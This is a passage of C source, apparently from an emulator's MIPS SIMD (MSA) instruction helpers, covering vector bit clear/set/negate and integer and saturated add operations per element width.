&(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_bclr_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_bclr_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_bclr_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_bclr_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_bclr_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_bclr_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_bclr_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_bclr_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_bclr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_bclr_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_bclr_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_bclr_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_bclr_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_bclr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_bclr_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_bclr_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_bneg_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return UNSIGNED(arg1 ^ (1LL << b_arg2), df); } void helper_msa_bneg_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_bneg_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_bneg_df(DF_BYTE, pws->b[1], 
pwt->b[1]); pwd->b[2] = msa_bneg_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_bneg_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_bneg_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_bneg_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_bneg_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_bneg_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_bneg_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_bneg_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_bneg_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_bneg_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_bneg_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_bneg_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_bneg_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_bneg_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_bneg_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_bneg_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_bneg_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_bneg_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_bneg_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_bneg_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_bneg_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_bneg_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_bneg_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_bneg_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_bneg_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_bneg_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_bneg_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_bneg_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_bneg_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_bneg_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_bneg_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_bset_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return UNSIGNED(arg1 | (1LL << b_arg2), df); } void helper_msa_bset_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_bset_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_bset_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_bset_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_bset_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_bset_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_bset_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_bset_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_bset_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_bset_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_bset_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_bset_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_bset_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_bset_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_bset_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_bset_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_bset_df(DF_BYTE, pws->b[15], pwt->b[15]); } void 
helper_msa_bset_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_bset_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_bset_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_bset_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_bset_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_bset_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_bset_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_bset_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_bset_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_bset_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_bset_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_bset_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_bset_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_bset_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_bset_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_bset_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_bset_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Fixed Multiply * -------------- * * +---------------+----------------------------------------------------------+ * | MADD_Q.H | Vector Fixed-Point Multiply and Add (halfword) | * | MADD_Q.W | Vector Fixed-Point Multiply and Add (word) | * | MADDR_Q.H | Vector Fixed-Point Multiply and Add Rounded (halfword) | * | MADDR_Q.W | Vector Fixed-Point Multiply and Add Rounded (word) | * | MSUB_Q.H | Vector Fixed-Point Multiply and Subtr. (halfword) | * | MSUB_Q.W | Vector Fixed-Point Multiply and Subtr. (word) | * | MSUBR_Q.H | Vector Fixed-Point Multiply and Subtr. Rounded (halfword)| * | MSUBR_Q.W | Vector Fixed-Point Multiply and Subtr. 
Rounded (word)     |
 * | MUL_Q.H       | Vector Fixed-Point Multiply (halfword)                  |
 * | MUL_Q.W       | Vector Fixed-Point Multiply (word)                      |
 * | MULR_Q.H      | Vector Fixed-Point Multiply Rounded (halfword)          |
 * | MULR_Q.W      | Vector Fixed-Point Multiply Rounded (word)              |
 * +---------------+----------------------------------------------------------+
 */

/* TODO: insert Fixed Multiply group helpers here */

/*
 * Float Max Min
 * -------------
 *
 * +---------------+----------------------------------------------------------+
 * | FMAX_A.W      | Vector Floating-Point Maximum (Absolute) (word)         |
 * | FMAX_A.D      | Vector Floating-Point Maximum (Absolute) (doubleword)   |
 * | FMAX.W        | Vector Floating-Point Maximum (word)                    |
 * | FMAX.D        | Vector Floating-Point Maximum (doubleword)              |
 * | FMIN_A.W      | Vector Floating-Point Minimum (Absolute) (word)         |
 * | FMIN_A.D      | Vector Floating-Point Minimum (Absolute) (doubleword)   |
 * | FMIN.W        | Vector Floating-Point Minimum (word)                    |
 * | FMIN.D        | Vector Floating-Point Minimum (doubleword)              |
 * +---------------+----------------------------------------------------------+
 */

/* TODO: insert Float Max Min group helpers here */

/*
 * Int Add
 * -------
 *
 * +---------------+----------------------------------------------------------+
 * | ADD_A.B       | Vector Add Absolute Values (byte)                        |
 * | ADD_A.H       | Vector Add Absolute Values (halfword)                    |
 * | ADD_A.W       | Vector Add Absolute Values (word)                        |
 * | ADD_A.D       | Vector Add Absolute Values (doubleword)                  |
 * | ADDS_A.B      | Vector Signed Saturated Add (of Absolute) (byte)         |
 * | ADDS_A.H      | Vector Signed Saturated Add (of Absolute) (halfword)     |
 * | ADDS_A.W      | Vector Signed Saturated Add (of Absolute) (word)         |
 * | ADDS_A.D      | Vector Signed Saturated Add (of Absolute) (doubleword)   |
 * | ADDS_S.B      | Vector Signed Saturated Add (of Signed) (byte)           |
 * | ADDS_S.H      | Vector Signed Saturated Add (of Signed) (halfword)       |
 * | ADDS_S.W      | Vector Signed Saturated Add (of Signed) (word)           |
 * | ADDS_S.D      | Vector Signed Saturated Add (of Signed) (doubleword)     |
 * | ADDS_U.B      | Vector Unsigned Saturated Add (of Unsigned) (byte)       |
 * | ADDS_U.H      | Vector Unsigned Saturated Add (of Unsigned) (halfword)   |
 * | ADDS_U.W      | Vector Unsigned Saturated Add (of Unsigned) (word)       |
 * | ADDS_U.D      | Vector Unsigned Saturated Add (of Unsigned) (doubleword) |
 * | ADDV.B        | Vector Add (byte)                                        |
 * | ADDV.H        | Vector Add (halfword)                                    |
 * | ADDV.W        | Vector Add (word)                                        |
 * | ADDV.D        | Vector Add (doubleword)                                  |
 * | HADD_S.H      | Vector Signed Horizontal Add (halfword)                  |
 * | HADD_S.W      | Vector Signed Horizontal Add (word)                      |
 * | HADD_S.D      | Vector Signed Horizontal Add (doubleword)                |
 * | HADD_U.H      | Vector Unsigned Horizontal Add (halfword)                |
 * | HADD_U.W      | Vector Unsigned Horizontal Add (word)                    |
 * | HADD_U.D      | Vector Unsigned Horizontal Add (doubleword)              |
 * +---------------+----------------------------------------------------------+
 */
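The saturated-add helpers that follow all use the same overflow-free pattern: compare one operand against the distance from the other operand to the clamp value, instead of computing the (possibly undefined) signed sum first. A standalone sketch for a signed byte lane (editor's addition; adds_s8 is a hypothetical name mirroring the msa_adds_s_df logic below):

/*
 * Illustrative sketch (editor's addition): saturating signed add without
 * ever overflowing, as in msa_adds_s_df() below.
 */
#include <stdint.h>
#include <stdio.h>

static int8_t adds_s8(int8_t a, int8_t b)
{
    if (a < 0) {
        return (INT8_MIN - a < b) ? a + b : INT8_MIN; /* clamp at -128 */
    }
    return (b < INT8_MAX - a) ? a + b : INT8_MAX;     /* clamp at +127 */
}

int main(void)
{
    printf("%d\n", adds_s8(100, 50));   /* saturates to 127 */
    printf("%d\n", adds_s8(-100, -50)); /* saturates to -128 */
    printf("%d\n", adds_s8(20, 30));    /* plain 50 */
    return 0;
}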
static inline int64_t msa_add_a_df(uint32_t df, int64_t arg1, int64_t arg2)
{
    uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1;
    uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2;
    return abs_arg1 + abs_arg2;
}

void helper_msa_add_a_b(CPUMIPSState *env,
                        uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);

    pwd->b[0] = msa_add_a_df(DF_BYTE, pws->b[0], pwt->b[0]);
    pwd->b[1] = msa_add_a_df(DF_BYTE, pws->b[1], pwt->b[1]);
    pwd->b[2] = msa_add_a_df(DF_BYTE, pws->b[2], pwt->b[2]);
    pwd->b[3] = msa_add_a_df(DF_BYTE, pws->b[3], pwt->b[3]);
    pwd->b[4] = msa_add_a_df(DF_BYTE, pws->b[4], pwt->b[4]);
    pwd->b[5] = msa_add_a_df(DF_BYTE, pws->b[5], pwt->b[5]);
    pwd->b[6] = msa_add_a_df(DF_BYTE, pws->b[6], pwt->b[6]);
    pwd->b[7] = msa_add_a_df(DF_BYTE, pws->b[7], pwt->b[7]);
    pwd->b[8] = msa_add_a_df(DF_BYTE, pws->b[8], pwt->b[8]);
    pwd->b[9] = msa_add_a_df(DF_BYTE, pws->b[9], pwt->b[9]);
    pwd->b[10] = msa_add_a_df(DF_BYTE, pws->b[10], pwt->b[10]);
    pwd->b[11] = msa_add_a_df(DF_BYTE, pws->b[11], pwt->b[11]);
    pwd->b[12] = msa_add_a_df(DF_BYTE, pws->b[12], pwt->b[12]);
    pwd->b[13] = msa_add_a_df(DF_BYTE, pws->b[13], pwt->b[13]);
    pwd->b[14] = msa_add_a_df(DF_BYTE, pws->b[14], pwt->b[14]);
    pwd->b[15] = msa_add_a_df(DF_BYTE, pws->b[15], pwt->b[15]);
}

void helper_msa_add_a_h(CPUMIPSState *env,
                        uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);

    pwd->h[0] = msa_add_a_df(DF_HALF, pws->h[0], pwt->h[0]);
    pwd->h[1] = msa_add_a_df(DF_HALF, pws->h[1], pwt->h[1]);
    pwd->h[2] = msa_add_a_df(DF_HALF, pws->h[2], pwt->h[2]);
    pwd->h[3] = msa_add_a_df(DF_HALF, pws->h[3], pwt->h[3]);
    pwd->h[4] = msa_add_a_df(DF_HALF, pws->h[4], pwt->h[4]);
    pwd->h[5] = msa_add_a_df(DF_HALF, pws->h[5], pwt->h[5]);
    pwd->h[6] = msa_add_a_df(DF_HALF, pws->h[6], pwt->h[6]);
    pwd->h[7] = msa_add_a_df(DF_HALF, pws->h[7], pwt->h[7]);
}

void helper_msa_add_a_w(CPUMIPSState *env,
                        uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);

    pwd->w[0] = msa_add_a_df(DF_WORD, pws->w[0], pwt->w[0]);
    pwd->w[1] = msa_add_a_df(DF_WORD, pws->w[1], pwt->w[1]);
    pwd->w[2] = msa_add_a_df(DF_WORD, pws->w[2], pwt->w[2]);
    pwd->w[3] = msa_add_a_df(DF_WORD, pws->w[3], pwt->w[3]);
}

void helper_msa_add_a_d(CPUMIPSState *env,
                        uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);

    pwd->d[0] = msa_add_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]);
    pwd->d[1] = msa_add_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]);
}

static inline int64_t msa_adds_a_df(uint32_t df, int64_t arg1, int64_t arg2)
{
    uint64_t max_int = (uint64_t)DF_MAX_INT(df);
    uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1;
    uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2;

    if (abs_arg1 > max_int || abs_arg2 > max_int) {
        return (int64_t)max_int;
    } else {
        return (abs_arg1 < max_int - abs_arg2) ?
abs_arg1 + abs_arg2 : max_int; } } void helper_msa_adds_a_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_adds_a_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_adds_a_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_adds_a_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_adds_a_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_adds_a_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_adds_a_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_adds_a_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_adds_a_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_adds_a_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_adds_a_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_adds_a_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_adds_a_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_adds_a_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_adds_a_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_adds_a_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_adds_a_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_adds_a_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_adds_a_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_adds_a_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_adds_a_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_adds_a_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_adds_a_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_adds_a_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_adds_a_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_adds_a_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_adds_a_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_adds_a_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_adds_a_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_adds_a_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_adds_a_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_adds_a_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_adds_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_adds_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_adds_s_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t max_int = DF_MAX_INT(df); int64_t min_int = DF_MIN_INT(df); if (arg1 < 0) { return (min_int - arg1 < arg2) ? arg1 + arg2 : min_int; } else { return (arg2 < max_int - arg1) ? 
arg1 + arg2 : max_int; } } void helper_msa_adds_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_adds_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_adds_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_adds_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_adds_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_adds_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_adds_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_adds_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_adds_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_adds_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_adds_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_adds_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_adds_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_adds_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_adds_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_adds_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_adds_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_adds_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_adds_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_adds_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_adds_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_adds_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_adds_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_adds_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_adds_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_adds_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_adds_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_adds_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_adds_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_adds_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_adds_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_adds_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_adds_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_adds_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_adds_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t max_uint = DF_MAX_UINT(df); uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return (u_arg1 < max_uint - u_arg2) ? 
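/*
 * Unsigned saturating add.  Worked example (DF_BYTE, max_uint = 255):
 * 200 + 100 would wrap to 44 in 8 bits; 200 < 255 - 100 is false, so
 * the result saturates to 255 instead.
 */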
u_arg1 + u_arg2 : max_uint; } void helper_msa_adds_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_adds_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_adds_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_adds_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_adds_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_adds_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_adds_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_adds_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_adds_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_adds_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_adds_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_adds_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_adds_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_adds_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_adds_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_adds_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_adds_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_adds_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_adds_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_adds_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_adds_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_adds_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_adds_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_adds_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_adds_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_adds_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_adds_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_adds_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_adds_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_adds_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_adds_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_adds_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t 